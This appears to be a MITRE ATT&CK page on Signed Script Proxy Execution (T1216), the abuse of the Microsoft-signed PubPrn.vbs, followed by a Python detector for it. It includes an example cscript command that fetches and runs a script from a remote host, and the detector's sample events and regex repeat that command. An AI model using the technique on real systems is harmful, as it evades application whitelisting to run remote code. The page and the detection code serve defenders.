Signed Script Proxy Execution

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]

ID: T1216

Tactic: Defense Evasion, Execution

Platform: Windows

Permissions Required: User

Data Sources: Process monitoring, Process command-line parameters

Supports Remote: No

Defense Bypassed: Application whitelisting, Digital Certificate Validation

Contributors: Praetorian

Version: 1.0

Examples

Name: APT32

Description: APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.[3]

Mitigation

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

Detection

Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
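The detection described above, worked through as an added example (not part of the ATT&CK page and not a MITRE tool): a small Python analyzer that reads process-creation events, flags a script host (cscript.exe or wscript.exe) running PubPrn.vbs, and raises the severity when the arguments carry a `script:` moniker that resolves to a remote HTTP or UNC location, which is the pattern in the page's example command. The event records and their field names (`Image`, `CommandLine`, modelled on Sysmon Event ID 1) are constructed for this example; the PROXY_SCRIPTS watch list holds only the script the page names and is meant to be extended.

```python
"""Added example: flag signed-script proxy execution (T1216) in process-creation events."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Windows script hosts that execute .vbs files.
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}

# Microsoft-signed scripts known to proxy execution. Only PubPrn.vbs is named on
# the page; add others here once confirmed for your environment.
PROXY_SCRIPTS = {"pubprn.vbs"}

# PubPrn.vbs passes its second argument to GetObject(); a "script:" moniker that
# points at an http(s) URL or a UNC path is the remote-execution pattern to catch.
# \b keeps the "script" inside "cscript" from matching.
REMOTE_MONIKER = re.compile(r"\bscript:(https?://|\\\\)", re.IGNORECASE)


@dataclass
class Finding:
    severity: str       # "low" = watched script ran; "high" = remote script: moniker
    image: str
    command_line: str
    reason: str


def basename(path: str) -> str:
    """Return the final path component in lower case, accepting \\ or / separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def analyze_event(event: Dict[str, str]) -> List[Finding]:
    """Examine one constructed process-creation event with Image and CommandLine."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    if basename(image) not in SCRIPT_HOSTS:
        return []                                   # not a script host: out of scope
    cmd_lower = cmd.lower()
    hits = sorted(s for s in PROXY_SCRIPTS if s in cmd_lower)
    if not hits:
        return []                                   # script host, but not a watched script
    if REMOTE_MONIKER.search(cmd):
        return [Finding("high", image, cmd,
                        f"{hits[0]} invoked with a remote script: moniker")]
    return [Finding("low", image, cmd,
                    f"{hits[0]} executed; review its arguments")]


def analyze_events(events: List[Dict[str, str]]) -> List[Finding]:
    """Run analyze_event over a batch of events and collect the findings."""
    findings: List[Finding] = []
    for event in events:
        findings.extend(analyze_event(event))
    return findings


# Constructed sample events (not captured data). The first mirrors the page's
# example command; the second is an ordinary PubPrn.vbs invocation with an LDAP
# path; the rest are script-host or non-script-host activity that should not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs "
                    r"127.0.0.1 script:http://192.168.1.100/hi.png"},
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs "
                    r"printserver01 LDAP://CN=printserver01,CN=Computers,DC=corp,DC=example"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript C:\Users\alice\AppData\Local\Temp\logon.vbs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -Command Get-Printer"},
]


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f.severity.upper()}] {f.reason}\n    {f.command_line}")
```

The low-severity finding exists on purpose: PubPrn.vbs has a legitimate use, so an ordinary invocation is worth a review queue rather than an alert, while the remote `script:` moniker is specific enough to page on. In production the same logic belongs in the SIEM query over your Sysmon or 4688 telemetry; command-line logging must be enabled for 4688 or the `CommandLine` field will be empty and only the low-severity branch can ever fire.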

References